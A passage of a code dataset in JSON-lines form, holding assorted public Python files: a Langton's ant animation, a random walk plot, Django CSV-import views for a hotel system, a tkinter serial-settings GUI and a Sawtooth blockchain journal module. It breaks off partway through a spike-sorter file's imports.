self.ant.move()\n\n\n\"\"\"\nrules strings: LR = basic ant\n RLR = Chaos\n LRRRRRLLR = fills grid\n RLRLRLRLRLR = quicker highway\n\"\"\"\n# get user input to create dictionary of ant movement rules\naccept = \"RL\"\nrule_string = \"\"\nwhile rule_string == \"\" or not all(c in accept for c in rule_string):\n rule_string = input(\"Enter rule string: \")\n\nrules = dict((k, v) for k, v in enumerate(rule_string))\nnum_rules = len(rule_string)\n\n# create ant and lattice\nN = 128\nmidpoint = N // 2\nant = Ant(midpoint, midpoint, 'W')\nlattice = LangAnt(ant, rules, N)\n\ncells = lattice.getGrid() # initial state\n\n# plot cells\nfig = plt.figure()\n\nimg = plt.imshow(cells, cmap=\"gnuplot2\", vmin=0, vmax=(num_rules - 1),\n animated=True)\n\n\ndef animate(i):\n \"\"\"perform animation step\"\"\"\n global lattice\n\n lattice.step()\n cells_updated = lattice.getGrid()\n\n img.set_array(cells_updated)\n\n return img,\n\n\ninterval = 0 # ms\n\n# animate 24 frames with interval, calling animate function at each frame\nani = animation.FuncAnimation(fig, animate, frames=24, interval=interval,\n blit=True)\n\nplt.show()\n","repo_name":"YanJiangJerry/COMP2048","sub_path":"ass03/lang_ant/lang_ant.py","file_name":"lang_ant.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14737790462","text":"import numpy as np\nimport sys\nimport math\nimport matplotlib.pyplot as plt\n\nn=sys.argv[1]\nm=int(n)\npi=np.pi\nal=np.random.random(m)\n\na=al*2*pi\nx=[]\ny=[]\nr=[]\nN=[]\n\nfor i in range(0,m):\n x.append(0)\n y.append(0)\n r.append(0)\n N.append(0)\n\nfor i in range(m):\n x[i]=x[i-1]+np.cos(a[i])\n y[i]=y[i-1]+np.sin(a[i])\n r[i]=r[i-1]+np.sqrt((x[i]*x[i])+(y[i]*y[i]))\n N[i]=i+1\n\nplt.plot(N,r)\nplt.show()\n\n","repo_name":"henrymmg/Laboratorio_computacional","sub_path":"browniano_2D.py","file_name":"browniano_2D.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16435247715","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nimport pandas as pd\nfrom .models import *\nfrom django.apps import apps\nfrom datetime import datetime\nfrom django_countries import countries\nimport re\n \n# Create your views here.\n\n@api_view(['GET'])\ndef import_accounts(request):\n file = 'mediafiles/import_data/all_accounts.csv'\n df = pd.read_csv(file)\n # df = df.drop_duplicates(subset=['Account Name'])\n # df = df.iloc[]\n # print(df.shape[0])\n\n # return Response({'account imported':'account imported'})\n\n for index, row in df.iterrows():\n print(index)\n if str(row['Email'])=='nan':\n email = ''\n else:\n email = row['Email']\n\n if str(row['GST ID'])=='nan':\n gst_id = ''\n else:\n gst_id = row['GST ID']\n\n if str(row['Status'])=='nan':\n is_active = False\n elif row['Status']=='Active':\n is_active = True\n else:\n is_active = False\n\n if str(row['Account Type'])=='nan':\n account_type = None\n else:\n account_type = row['Account Type']\n\n if str(row['Phone'])=='nan':\n phone_number = ''\n else:\n phone_number = row['Phone']\n\n if str(row['IATA'])=='nan':\n iata = ''\n else:\n iata = row['IATA']\n\n if str(row['Rate setup - Rate code'])=='nan':\n rate_code = None\n else:\n rate_code = RateCode.objects.get(rate_code= row['Rate setup - Rate code'])\n\n print(row['Address'])\n\n account_name, created = Account.objects.update_or_create(\n account_name=row['Account Name'],\n account_type = account_type,\n email =email,\n phone_number = phone_number,\n defaults={\n 'address_line_1' : row['Address'],\n 'iata':iata,\n 'gst_id':gst_id,\n 'is_btc_approved':row['Is BTC Approved'],\n 'rate_code':rate_code,\n 'is_active': is_active}\n )\n\n return Response({'account imported':'account imported'})\n\n@api_view(['GET'])\ndef import_bookers(request):\n file = 'mediafiles/import_data/all_bookers.csv'\n df = pd.read_csv(file)\n\n\n for index, row in df.iterrows():\n print(index)\n if str(row['Company'])!= 'nan':\n if Account.objects.filter(account_name = row['Company']).count()>1:\n Account.objects.filter(account_name = row['Company'])[0]\n else:\n account = Account.objects.get(account_name = row['Company'])\n else:\n account = None\n # account = Account.objects.first()\n\n booker, created = Booker.objects.update_or_create(\n account = account,\n name = row['Name'],\n email = row['Email'],\n phone_number = row['Phone'],\n )\n\n return Response({'bookers imported':'bookers imported'})\n\n@api_view(['GET'])\ndef import_guests(request):\n file = 'mediafiles/import_data/all_guests.csv'\n df = pd.read_csv(file)\n df = df.iloc[23400:]\n # print(dict(countries))\n # email = 'thejo.k.@naturalremedies.com'\n\n # print(email)\n # return Response({'guests imported':'guests imported'})\n # if \".\" in email[:email.index(\"@\")]:\n # print(\"There is a period before the @ symbol.\")\n # else:\n # print(\"There is no period before the @ symbol.\")\n\n # GuestProfile.objects.all().delete()\n for index, row in df.iterrows():\n\n print(index)\n print(row['Name'])\n\n if str(row['Date Of Birth']) == 'nan':\n dob = None\n else:\n dob = datetime.strptime(str(row['Date Of Birth']), \"%d-%b-%Y\")\n dob = dob\n\n if str(row['Phone']) == 'nan':\n phone_number = ''\n else:\n phone_number = row['Phone']\n\n if str(row['Status']) == 'nan':\n guest_status = ''\n else:\n guest_status = row['Status']\n\n if str(row['Nationality']) == 'nan':\n nationality = ''\n else:\n COUNTRY_DICT = dict(countries)\n\n if row['Nationality'] == 'United States':\n row['Nationality'] = 'United States of America'\n\n if row['Nationality'] == 'Russian Federation':\n row['Nationality'] = 'Russia'\n\n if row['Nationality'] == 'Ireland {Republic}':\n row['Nationality'] = 'Ireland'\n\n if row['Nationality'] == 'Korea South':\n row['Nationality'] = 'South Korea'\n\n if row['Nationality'] == 'Korea North':\n row['Nationality'] = 'North Korea'\n\n if row['Nationality'] == 'Trinidad & Tobago':\n row['Nationality'] = 'Trinidad and Tobago'\n\n if row['Nationality'] == 'Czech Republic':\n row['Nationality'] = 'Czechia'\n\n if row['Nationality'] == 'Swaziland':\n row['Nationality'] = 'Eswatini'\n\n nationality = list(filter(lambda x: COUNTRY_DICT[x] == row['Nationality'], COUNTRY_DICT))[0]\n \n\n if str(row['GST']) == 'nan':\n gst_id = ''\n else:\n gst_id = row['GST']\n\n\n if str(row['Email']) == 'nan':\n email = ''\n else:\n email = row['Email']\n\n for index, char in enumerate(email):\n if char == '@':\n if email[index - 1]=='.':\n new_email = email[:index-1] + email[index:]\n email = new_email\n break\n\n if \"_\" in email[email.find(\"@\"):]:\n email = email.replace(\"_\", \"-\")\n\n index = email.find(\"@\")\n\n if '.' == email[index-1]:\n email = email[:index-1]+email[index:]\n print(email)\n\n if '..' in email[:index]:\n email = email.replace('..','.',1)\n\n if str(row['Corporate']) == 'nan':\n company = None\n else:\n if Account.objects.filter(account_name = row['Corporate']).count()>1:\n company = Account.objects.filter(account_name = row['Corporate'])[0]\n else:\n company = Account.objects.get(account_name = row['Corporate'])\n\n if str(row['Name']) == 'nan':\n name = 'nan'\n else:\n split_string = row['Name'].split('.')\n salutation = split_string[0]\n name = '.'.join(split_string[1:])\n salutation=salutation.strip()\n name=name.strip()\n if name =='':\n name = 'nan'\n\n if str(row['Source']) == 'Simple Guest':\n continue\n\n guest, created = GuestProfile.objects.update_or_create(\n last_name = name,\n salutation = salutation,\n email = email,\n phone_number = phone_number,\n defaults = \n {\n 'guest_status' : guest_status,\n 'address_line_1' : row['Address'],\n 'gst_id':gst_id,\n 'nationality':nationality,\n 'dob' : dob,\n 'company' : company,\n 'guest_type':row['Source'],\n }\n )\n\n return Response({'guests imported':'guests imported'})","repo_name":"pranavdrake/pms_api","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14128682940","text":"\"\"\"\nIf Else statement in python is used to check various conditions inside a code\nNote: If we use if instead of elif in all if else statements, python interpreter will check all the conditions\neven after the desired condition is met, which is not a efficient way of coding.\n\"\"\"\n\n# Using in & not in operator in if else:\n\nage = int(input())\nlst = [10, 11, 12]\n\nif age in lst:\n print(\"You will get a candy\")\nelif age not in lst and age<60:\n print(\"You will get a Toffee\")\nelif age >= 60 and age < 100:\n print(\"You will get a coffee\")\nelif age>=100 and age :\n print(\"You will get a Cup of Tea\")","repo_name":"puja809/Python","sub_path":"IfElse.py","file_name":"IfElse.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22269174350","text":"class Solution:\n def countCharacters(self, words: List[str], chars: str) -> int:\n charsFreq={}\n for char in chars:\n charsFreq[char]=1+charsFreq.get(char,0)\n \n ans=0\n for word in words:\n tmp={}\n for char in word:\n tmp[char]=1+tmp.get(char,0)\n res=True\n for key in tmp.keys():\n if charsFreq.get(key,None) and tmp[key]<=charsFreq[key]:\n res=True\n else:\n res=False\n break\n if res:\n ans+=len(word)\n return ans\n","repo_name":"ofmukesh/Learning","sub_path":"DailyChallenge/countCharacters.py","file_name":"countCharacters.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21113797871","text":"'''\nimport tkinter\nwin = tkinter.Tk()\nwin.geometry(\"{}x{}\".format(300,250)\n\nbt = tkinter.Button(win,text = \"Quit\")\nbt.grid(row=0,column=2)\n#lb_test = tkinter.Label(win, text=\"label Create\")\nlb_test = tkinter.Label(win, text=\"label Create\")\nlb_test.grid(row=0, column=1)\nwin.mainloop()\n'''\n'''\nimport tkinter\ndef change_bg():\n\tbtn.configure(background = \"green\")\nmywin = tkinter.Tk()\nmywin.geometry(\"{}x{}\".format(200,200))\nframe_up = tkinter.Frame(mywin, height = 60, width = 90, background = \"blue\")\nframe_down = tkinter.Frame(mywin, height = 30, width = 90, background = \"red\")\nframe_up.pack()\nframe_down.pack()\nbtn = tkinter.Button(frame_down, text = \"click\", command = change_bg,\nforeground = \"white\", background = \"black\",\nactiveforeground = \"blue\",\nactivebackground = \"#FF007F\")\nbtn.pack()\nmywin.mainloop()\n'''\nimport tkinter\n\ndef f_comport():\n\tv_comport.set(v_comport.get()+1)\n\ndef f_baud():\n\tnumber.set(number.get()+100)\ndef f_dbit():\n\tv_dbit.set(v_dbit.get()+2)\n\ndef f_sbit():\n\tv_sbit.set(v_sbit.get()+1)\n\ndef f_okbtn():\n\tprint(\"data saved and serial ComPort setting\")\n\ndef f_ccbtn():\n\tprint(\"shut down cc btn\")\n\nmywin = tkinter.Tk()\nmywin.geometry(\"200x300\")\n\nframe = tkinter.Frame(mywin)\nframe.pack()\n\n\nv_comport = tkinter.IntVar(value = 0)\n#\nbutton1 = tkinter.Button(frame, text = \"ComPort\", command = f_comport)\nbutton1.pack()\n#\nlabel1 = tkinter.Label(frame, text = \"start\", textvariable = v_comport)\nlabel1.pack()\n\n\n\nnumber = tkinter.IntVar(value = 0)\n#\nbutton1 = tkinter.Button(frame, text = \"baud rate\", command = f_baud)\nbutton1.pack()\n#\nlabel1 = tkinter.Label(frame, text = \"start\", textvariable = number)\nlabel1.pack()\n\n\n\n\nv_dbit = tkinter.IntVar(value = 0)\n#\nbutton2 = tkinter.Button(frame, text = \"data bit\", command = f_dbit)\nbutton2.pack()\n#\nlabel2 = tkinter.Label(frame, text = \"start\", textvariable = v_dbit)\nlabel2.pack()\n\n\nv_sbit = tkinter.IntVar(value = 0)\n#\nbutton2 = tkinter.Button(frame, text = \"Stop bit\", command = f_sbit)\nbutton2.pack()\n#\nlabel2 = tkinter.Label(frame, text = \"start\", textvariable = v_sbit)\nlabel2.pack()\n\nok_btn = tkinter.Button(frame,text = \"OK\",command = f_okbtn)\nok_btn.pack()\n\ncc_btn = tkinter.Button(frame,text = \"cancel\",command = f_ccbtn)\ncc_btn.pack()\n\nmywin.mainloop()","repo_name":"d-h-k/PyTerm","sub_path":"Module/superpi.py","file_name":"superpi.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2656526966","text":"import cv2\nimport img_processing2\nimport matplotlib.pyplot as plt\nimg2 = cv2.imread(\"./base10.jpg\")\n\ncolor = ('b','g','r')\nfor i,col in enumerate(color):\n histr = cv2.calcHist([img2],[i],None,[256],[0,256])\n plt.plot(histr,color = col)\n plt.xlim([0,256])\n #histr += histr\n\n\n\n\nplt.savefig(\"hist9.png\")\nplt.show()","repo_name":"Naoya-Tagawa/3dprinter_visual_impaired","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35153757907","text":"from concurrent.futures import ThreadPoolExecutor\nimport logging\nimport queue\nfrom threading import RLock\nfrom threading import Thread\nimport time\nimport copy\nimport random\nimport string\n\nfrom sawtooth_validator.scheduler.serial import SchedulerError\nfrom sawtooth_validator.server.messages import BlockRequestMessage, \\\n BlockMessage\nfrom sawtooth_validator.protobuf.block_pb2 import BlockHeader\n\nfrom sawtooth_validator.journal.block_wrapper import BlockWrapper\nfrom sawtooth_validator.journal.block_wrapper import BlockState\nfrom sawtooth_validator.journal.block_wrapper import BlockStatus\n\nLOGGER = logging.getLogger(__name__)\n\n\nNULLIDENTIFIER = \"0000000000000000\"\n\n\ndef _generate_id(length=16):\n return ''.join(\n random.SystemRandom().choice(string.ascii_uppercase + string.digits)\n for _ in range(length))\n\n\nclass BlockPublisher(object):\n \"\"\"\n Responsible for generating new blocks and publishing them when the\n Consensus deems it appropriate.\n \"\"\"\n def __init__(self,\n consensus,\n transaction_executor,\n send_message,\n squash_handler):\n self._lock = RLock()\n self._candidate_block = None # the next block in potentia\n self._consensus = consensus # the consensus object.\n self._transaction_executor = transaction_executor\n self._pending_batches = [] # batches we are waiting for\n self._validated_batches = []\n self._send_message = send_message\n self._scheduler = None\n self._chain_head = None\n self._squash_handler = squash_handler\n\n def _build_block(self, chain_head):\n \"\"\" Build a candidate block\n \"\"\"\n if self._chain_head is None:\n block_header = self.generate_genesis_block()\n else:\n block_header = BlockHeader(\n block_num=chain_head.block_num + 1,\n previous_block_id=chain_head.header_signature)\n self._consensus.initialize_block(block_header)\n\n # create a new scheduler\n # TBD move factory in to executor for easier mocking --\n # Yes I want to make fun of it.\n self._scheduler = self._transaction_executor.create_scheduler(\n self._squash_handler, chain_head.state_root_hash)\n\n self._transaction_executor.execute(self._scheduler)\n for batch in self._pending_batches:\n self._scheduler.add_batch(batch)\n self._pending_batches = []\n block = BlockWrapper(block_header)\n return block\n\n def _sign_block(self, block):\n \"\"\" The block should be complete and the final\n signature from the publishing validator(this validator) needs to\n be added.\n \"\"\"\n # Temp signature creation to use as identifier\n block.set_signature(_generate_id())\n return block\n\n def on_batch_received(self, batch):\n \"\"\"\n A new batch is received, send it for validation\n :param block:\n :return:\n \"\"\"\n with self._lock:\n self._pending_batches.append(batch)\n if self._scheduler:\n try:\n self._scheduler.add_batch(batch)\n except SchedulerError:\n pass\n\n def on_chain_updated(self, chain_head,\n committed_batches=None,\n uncommitted_batches=None):\n \"\"\"\n The existing chain has been updated, the current head block has\n changed.\n\n chain_head: the new head of block_chain\n committed_batches:\n uncommitted_batches: the list of transactions if any that are now\n de-committed due to the switch in forks.\n\n :return:\n \"\"\"\n with self._lock:\n LOGGER.info(\n 'Chain updated, new head: num=%s id=%s state=%s prev=%s',\n chain_head.block_num,\n chain_head.header_signature,\n chain_head.state_root_hash,\n chain_head.previous_block_id)\n self._chain_head = chain_head\n if self._candidate_block is not None and \\\n chain_head is not None and \\\n chain_head.header_signature == \\\n self._candidate_block.previous_block_id:\n # nothing to do. We are building of the current head.\n # This can happen after we publish a block and speculatively\n # create a new block.\n return\n else:\n # TBD -- we need to rebuild the pending transaction queue --\n # which could be an unknown set depending if we switched forks\n\n # new head of the chain.\n self._candidate_block = self._build_block(chain_head)\n\n def _finalize_block(self, block):\n if self._scheduler:\n self._scheduler.finalize()\n self._scheduler.complete(block=True)\n\n # Read valid batches from self._scheduler\n pending_batches = copy.copy(self._pending_batches)\n self._pending_batches = []\n\n state_hash = None\n for batch in pending_batches:\n batch_status = self._scheduler.batch_status(batch.header_signature)\n # if a batch_status is None, this means that the executor never\n # received the batch and it should be added to\n # the pending_batches\n if batch_status is None:\n self._pending_batches.append(batch)\n elif batch_status.valid:\n self._validated_batches.append(batch)\n state_hash = batch_status.state_hash\n\n block.add_batches(self._validated_batches)\n self._validated_batches = []\n\n # might need to take state_hash\n self._consensus.finalize_block(block.block_header)\n if state_hash is not None:\n block.set_state_hash(state_hash)\n self._sign_block(block)\n return block\n\n def on_check_publish_block(self, force=False):\n \"\"\"\n Ask the consensus module if it is time to claim the candidate block\n if it is then, claim it and tell the world about it.\n :return:\n \"\"\"\n with self._lock:\n if self._candidate_block is None and len(self._pending_batches) \\\n != 0:\n self._candidate_block = self._build_block(self._chain_head)\n\n if self._candidate_block and \\\n (force or len(self._pending_batches) != 0) and \\\n self._consensus.check_publish_block(self._candidate_block):\n candidate = self._candidate_block\n self._candidate_block = None\n candidate = self._finalize_block(candidate)\n # if no batches are in the block, do not send it out\n if len(candidate.batches) == 0:\n LOGGER.info(\"No Valid batches added to block, dropping %s\",\n candidate.header_signature)\n return\n msg = BlockMessage(candidate.get_block())\n self._send_message(msg)\n\n LOGGER.info(\"Claimed Block: %s\", candidate.header_signature)\n\n # create a new block based on this one -- opportunistically\n # assume the published block is the valid block.\n self.on_chain_updated(candidate)\n\n def generate_genesis_block(self):\n genesis_header = BlockHeader(previous_block_id=NULLIDENTIFIER,\n block_num=0)\n\n # Small hack here not asking consensus if it is happy.\n\n self._candidate_block = \\\n self._finalize_block(BlockWrapper(genesis_header))\n return self._candidate_block\n\n\nclass BlockValidator(object):\n \"\"\"\n Responsible for validating a block, handles both chain extensions and fork\n will determine if the new block should be the head of the chain and\n\n \"\"\"\n def __init__(self, consensus,\n block_store,\n new_block,\n chain_head,\n request_block_cb,\n done_cb,\n executor,\n squash_handler):\n self._consensus = consensus\n self._block_store = block_store\n self._new_block = new_block\n self._chain_head = chain_head\n self._request_block_cb = request_block_cb\n self._done_cb = done_cb\n self._executor = executor\n self._squash_handler = squash_handler\n self._commit_new_block = False\n\n def commit_new_block(self):\n return self._commit_new_block\n\n @property\n def new_block(self):\n return self._new_block\n\n @property\n def chain_head(self):\n return self._chain_head\n\n def _validate_block(self, block_state):\n if block_state.status == BlockStatus.Valid:\n return True\n elif block_state.status == BlockStatus.Invalid:\n return False\n else:\n valid = True\n # verify header_signature\n\n if valid:\n if len(block_state.block.batches) > 0:\n scheduler = self._executor.create_scheduler(\n self._squash_handler,\n self.chain_head.block.state_root_hash)\n self._executor.execute(scheduler)\n\n for i in range(len(block_state.block.batches) - 1):\n scheduler.add_batch(block_state.block.batches[i])\n scheduler.add_batch(block_state.block.batches[-1],\n block_state.block.state_root_hash)\n scheduler.finalize()\n scheduler.complete(block=True)\n state_hash = None\n for i in range(len(block_state.block.batches)):\n batch_status = scheduler.batch_status(\n block_state.block.batches[i].header_signature)\n # If the batch_status is None, the executor did not\n # receive the batch\n if (batch_status is not None) and batch_status.valid:\n state_hash = batch_status.state_hash\n else:\n valid = False\n if block_state.block.state_root_hash != state_hash:\n valid = False\n if valid:\n valid = self._consensus.verify_block(block_state)\n\n # Update the block store\n block_state.weight = \\\n self._consensus.compute_block_weight(block_state)\n block_state.status = BlockStatus.Valid if \\\n valid else BlockStatus.Invalid\n self._block_store[block_state.block.header_signature] = block_state\n return valid\n\n def run(self):\n LOGGER.info(\"Starting block validation of : %s\",\n self._new_block.block.header_signature)\n current_chain = [] # ordered list of the current chain\n new_chain = []\n\n new_block_state = self._new_block\n current_block_state = self._chain_head\n # 1) find the common ancestor of this block in the current chain\n # Walk back until we have both chains at the same length\n while new_block_state.block.block_num > \\\n current_block_state.block.block_num\\\n and new_block_state.block.previous_block_id != \\\n NULLIDENTIFIER:\n new_chain.append(new_block_state)\n try:\n new_block_state = \\\n self._block_store[\n new_block_state.block.previous_block_id]\n except KeyError:\n # required block is missing\n self._request_block_cb(\n new_block_state.block.previous_block_id, self)\n return\n\n while current_block_state.block.block_num > \\\n new_block_state.block.block_num \\\n and new_block_state.block.previous_block_id != \\\n NULLIDENTIFIER:\n current_chain.append(current_block_state)\n current_block_state = \\\n self._block_store[\n current_block_state.block.previous_block_id]\n\n # 2) now we have both chain at the same block number\n # continue walking back until we find a common block.\n while current_block_state.block.header_signature != \\\n new_block_state.block.header_signature:\n if current_block_state.block.previous_block_id == \\\n NULLIDENTIFIER or \\\n new_block_state.block.previous_block_id == \\\n NULLIDENTIFIER:\n # We are at a genesis block and the blocks are not the\n # same\n LOGGER.info(\"Block rejected due to wrong genesis : %s %s\",\n current_block_state.block.header_signature,\n new_block_state.block.header_signature)\n\n self._done_cb(self)\n return\n new_chain.append(new_block_state)\n new_block_state = \\\n self._block_store[\n new_block_state.block.previous_block_id]\n\n current_chain.append(current_block_state)\n current_block_state = \\\n self._block_store[\n current_block_state.block.previous_block_id]\n\n # 3) We now have the root of the fork.\n # determine the validity of the new fork\n for block in reversed(new_chain):\n if not self._validate_block(block):\n LOGGER.info(\"Block validation failed: %s\",\n block)\n self._done_cb(self)\n return\n\n # 4) new chain is valid... should we switch to it?\n LOGGER.info(\"Finished block validation of XXXX: %s, %s\",\n new_chain[0].weight, self._chain_head.weight)\n self._commit_new_block = new_chain[0].weight > self._chain_head.weight\n\n # Tell the journal we are done\n self._done_cb(self)\n LOGGER.info(\"Finished block validation of : %s\",\n self._new_block.block.header_signature)\n\n\nclass ChainController(object):\n \"\"\"\n To evaluating new blocks to determine if they should extend or replace\n the current chain. If they are valid extend the chain.\n \"\"\"\n def __init__(self,\n consensus,\n block_store,\n send_message,\n executor,\n transaction_executor,\n on_chain_updated,\n squash_handler):\n self._lock = RLock()\n self._consensus = consensus\n self._block_store = block_store\n self._send_message = send_message\n self._executor = executor\n self._transaction_executor = transaction_executor\n self._notifiy_on_chain_updated = on_chain_updated\n self._sqaush_handler = squash_handler\n\n self._blocks_requested = {} # a set of blocks that were requested.\n self._blocks_processing = {} # a set of blocks that are\n # currently being processed.\n self._blocks_pending = {} # set of blocks that the previous block\n # is being processed. Once that completes this block will be\n # scheduled for validation.\n\n try:\n self._chain_head = \\\n self._block_store[self._block_store[\"chain_head_id\"]]\n\n LOGGER.info(\"Chain controller initialized with chain head: %s\",\n self._chain_head.block.header_signature)\n except Exception as e:\n LOGGER.error(\"Invalid block store. Head of the block chain cannot \"\n \"be determined: %s\", e)\n raise\n\n self._notifiy_on_chain_updated(self._chain_head.block)\n\n @property\n def chain_head(self):\n return self._chain_head\n\n def _verify_block(self, block_state):\n validator = BlockValidator(\n consensus=self._consensus,\n new_block=block_state,\n chain_head=self._chain_head,\n block_store=self._block_store,\n request_block_cb=self._request_block,\n done_cb=self.on_block_validated,\n executor=self._transaction_executor,\n squash_handler=self._sqaush_handler)\n self._blocks_processing[block_state.block.header_signature] = validator\n self._executor.submit(validator.run)\n\n def _request_block(self, block_id, validator):\n # TBD add request time and time out\n self._blocks_requested[block_id] = validator\n self._send_message(BlockRequestMessage(block_id))\n\n def on_block_validated(self, validator):\n \"\"\"\n Message back from the block validator\n :param block:\n :return:\n \"\"\"\n with self._lock:\n LOGGER.info(\"on_block_validated : %s\",\n validator.new_block.block.header_signature)\n # remove from the processing list\n del self._blocks_processing[\n validator.new_block.block.header_signature]\n\n # if the head has changed, since we started the work.\n if validator.chain_head != self._chain_head:\n # chain has advanced since work started.\n # the block validation work we have done is saved.\n self._verify_block(validator.new_block)\n elif validator.commit_new_block():\n self._chain_head = validator.new_block\n self._block_store[\"chain_head_id\"] = \\\n self._chain_head.block.header_signature\n LOGGER.info(\"Chain head updated to: %s\",\n self._chain_head.block.header_signature)\n # tell everyone else the chain is updated\n self._notifiy_on_chain_updated(self._chain_head.block)\n\n pending_blocks = \\\n self._blocks_pending.pop(\n self._chain_head.block.previous_block_id, [])\n for pending_block in pending_blocks:\n self._verify_block(pending_block)\n\n def on_block_received(self, block):\n with self._lock:\n if block.header_signature in self._block_store:\n # do we already have this block\n return\n header = BlockHeader()\n header.ParseFromString(block.header)\n block = BlockWrapper(header, block)\n\n block_state = BlockState(block_wrapper=block, weight=0,\n status=BlockStatus.Unknown)\n self._block_store[block.header_signature] = block_state\n self._blocks_pending[block.header_signature] = []\n if block.header_signature in self._blocks_requested:\n # is it a requested block\n # route block to the validator that requested\n validator = self._blocks_requested.pop(block.header_signature)\n if validator.chain_head.block.header_signature != \\\n self._chain_head.block.header_signature:\n # the head of the chain has changed start over\n self._verify_block(validator.new_block)\n else:\n self._executor.submit(validator.run)\n elif block.previous_block_id in self._blocks_processing:\n # if the previous block is being processed...put it in a wait\n # queue\n pending_blocks = \\\n self._blocks_pending.get(block.previous_block_id,\n [])\n pending_blocks.append(block_state)\n self._blocks_pending[block.previous_block_id] = \\\n pending_blocks\n else:\n # schedule this block for validation.\n self._verify_block(block_state)\n\n\nclass Journal(object):\n \"\"\"\n Manages the block chain, This responsibility boils down\n 1) to evaluating new blocks to determine if they should extend or replace\n the current chain. Handled by the ChainController/\n 2) Claiming new blocks, handled by the BlockPublisher\n\n This object provides the threading and event queue for the processors.\n\n \"\"\"\n\n class _ChainThread(Thread):\n def __init__(self, chain_controller, block_queue):\n Thread.__init__(self)\n self._block_publisher = chain_controller\n self._block_queue = block_queue\n self._exit = False\n\n def run(self):\n while True:\n try:\n block = self._block_queue.get(timeout=0.1)\n self._block_publisher.on_block_received(block)\n except queue.Empty:\n time.sleep(0.1)\n if self._exit:\n return\n\n def stop(self):\n self._exit = True\n\n class _PublisherThread(Thread):\n def __init__(self, block_publisher, batch_queue):\n Thread.__init__(self)\n self._block_publisher = block_publisher\n self._batch_queue = batch_queue\n self._exit = False\n\n def run(self):\n while True:\n try:\n batch = self._batch_queue.get(timeout=0.1)\n self._block_publisher.on_batch_received(batch)\n except queue.Empty:\n time.sleep(0.1)\n\n self._block_publisher.on_check_publish_block()\n if self._exit:\n return\n\n def stop(self):\n self._exit = True\n\n def __init__(self,\n consensus,\n block_store,\n send_message,\n transaction_executor,\n squash_handler,\n first_state_root):\n self._consensus = consensus\n self._block_store = block_store\n self._send_message = send_message\n self._squash_handler = squash_handler\n\n self._block_publisher = BlockPublisher(\n consensus=consensus.BlockPublisher(),\n transaction_executor=transaction_executor,\n send_message=send_message,\n squash_handler=squash_handler\n )\n self._batch_queue = queue.Queue()\n self._publisher_thread = self._PublisherThread(self._block_publisher,\n self._batch_queue)\n # HACK until genesis tool is working\n if \"chain_head_id\" not in self._block_store:\n genesis_block = BlockState(\n block_wrapper=self._block_publisher.generate_genesis_block(),\n weight=0,\n status=BlockStatus.Valid)\n genesis_block.block.set_state_hash(first_state_root)\n\n self._block_store[genesis_block.block.header_signature] = \\\n genesis_block\n self._block_store[\"chain_head_id\"] = \\\n genesis_block.block.header_signature\n self._block_publisher.on_chain_updated(genesis_block.block)\n LOGGER.info(\"Journal created genesis block: %s\",\n genesis_block.block.header_signature)\n\n self._chain_controller = ChainController(\n consensus=consensus.BlockVerifier(),\n block_store=block_store,\n send_message=send_message,\n executor=ThreadPoolExecutor(1),\n transaction_executor=transaction_executor,\n on_chain_updated=self._block_publisher.on_chain_updated,\n squash_handler=self._squash_handler\n )\n self._block_queue = queue.Queue()\n self._chain_thread = self._ChainThread(self._chain_controller,\n self._block_queue)\n\n def get_current_root(self):\n # return self._block_publisher._chain_head.state_root_hash\n return self._chain_controller.chain_head.block.state_root_hash\n\n def start(self):\n # TBD do load activities....\n # TBD transfer activities - request chain-head from\n # network\n self._publisher_thread.start()\n self._chain_thread.start()\n\n def stop(self):\n # time to murder the child threads. First ask politely for\n # suicide\n self._publisher_thread.stop()\n self._chain_thread.stop()\n\n def on_block_received(self, block):\n self._block_queue.put(block)\n\n def on_batch_received(self, batch):\n self._batch_queue.put(batch)\n\n def on_block_request(self, block_id):\n if block_id in self._block_store:\n msg = BlockMessage(self._block_store[block_id].block)\n self._send_message(msg)\n","repo_name":"vdt/sawtooth-core","sub_path":"validator/sawtooth_validator/journal/journal.py","file_name":"journal.py","file_ext":"py","file_size_in_byte":24779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"41623347744","text":"'''\n12- Escribir un programa que le pida al usuario que ingrese \ndos números enteros, y luego imprima \"El primer número es positivo\" \nsi el primer número es mayor que cero, \"El segundo número es positivo\" \nsi el segundo número es mayor que cero, o \"Ambos números son negativos\" \nsi los dos números son negativos .\n'''\n\nprimer_numero_str = input(\"ingrese un numero\")\nprimer_numero_int = int(primer_numero_str)\n\nsegundo_numero_str = input(\"ingrese otro numero\")\nsegundo_numero_int = int(segundo_numero_str)\n\n\nif(primer_numero_int > 0):\n print(\"El primer numero es positivo\")\nelif(segundo_numero_int > 0):\n print(\"El segundo numero es positivo\")\nelse:\n print(\"Ambos son negativos\")\n\n\n\n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"1-Ejercicios-If-GUIA/12_ejercicio_positivo.py","file_name":"12_ejercicio_positivo.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17888711207","text":"from pathlib import Path\nimport os\nfrom typing import Union\nimport shutil\nimport sys\n\nimport numpy as np\n\nfrom spikeinterface.core.core_tools import write_to_h5_dataset_format\nfrom ..basesorter import BaseSorter\nfrom ..utils import ShellScript\n\n# from spikeinterface.extractors import MaxOneRecordingExtractor\nfrom spikeinterface.extractors 